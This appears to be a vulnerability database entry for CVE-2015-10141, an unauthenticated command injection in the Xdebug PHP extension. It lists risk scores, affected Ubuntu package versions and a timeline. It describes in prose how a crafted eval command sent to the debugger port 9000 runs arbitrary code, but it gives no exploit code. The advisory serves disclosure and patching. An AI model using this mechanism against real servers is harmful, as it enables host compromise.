VDB

CVE-2015-10141

CVE-2015-10141 PUBLISHED

An unauthenticated OS command injection vulnerability exists within Xdebug versions 2.5.5 and earlier, a PHP debugging extension developed by Derick Rethans. When remote debugging is enabled, Xdebug listens on port 9000 and accepts debugger protocol commands without authentication. An attacker can send a crafted eval command over this interface to execute arbitrary PHP code, which may invoke system-level functions such as system() or passthru(). This results in full compromise of the host under the privileges of the web server user.

EPSS 65.71% · 98.5th percentile

Risk Scores

EPSS Score
65.71%
98.5th percentile

Affected Products

VendorProductVersions
Ubuntu:20.04:LTSxdebug0, 2.9.2+2.8.1+2.5.5-1build1, 2.9.2+2.8.1+2.5.5-1
Ubuntu:16.04:LTSxdebug0, 2.3.3-1ubuntu1, 2.3.3-2
Ubuntu:18.04:LTSxdebug2.5.5-3, 2.6.0-0ubuntu1, 0
Ubuntu:24.04:LTSxdebug0, 3.2.0+3.1.6+2.9.8+2.8.1+2.5.5-3build1, 3.2.0+3.1.6+2.9.8+2.8.1+2.5.5-3ubuntu1
Ubuntu:22.04:LTSxdebug*, 0, 3.0.3+2.9.8+2.8.1+2.5.5-0+deb11u1build1
Ubuntu:25.10xdebug0, 3.4.3-1, 3.4.5-3

Exploit Intelligence

…and 41 more exploits

Timeline

  • May 29, 2018 PoC Published
  • Jul 23, 2025 CVE Published
  • Jul 24, 2025 EPSS Score
  • Aug 2, 2025 EPSS Score
  • Aug 13, 2025 PoC Published
  • Aug 17, 2025 EPSS Score
  • Aug 20, 2025 EPSS Score
  • Sep 7, 2025 EPSS Score
  • Sep 16, 2025 EPSS Score
  • Oct 4, 2025 EPSS Score
  • Oct 8, 2025 EPSS Score
  • Oct 13, 2025 EPSS Score

References

Open in Interactive Console →
$ Console Community · 100/wk Open console ›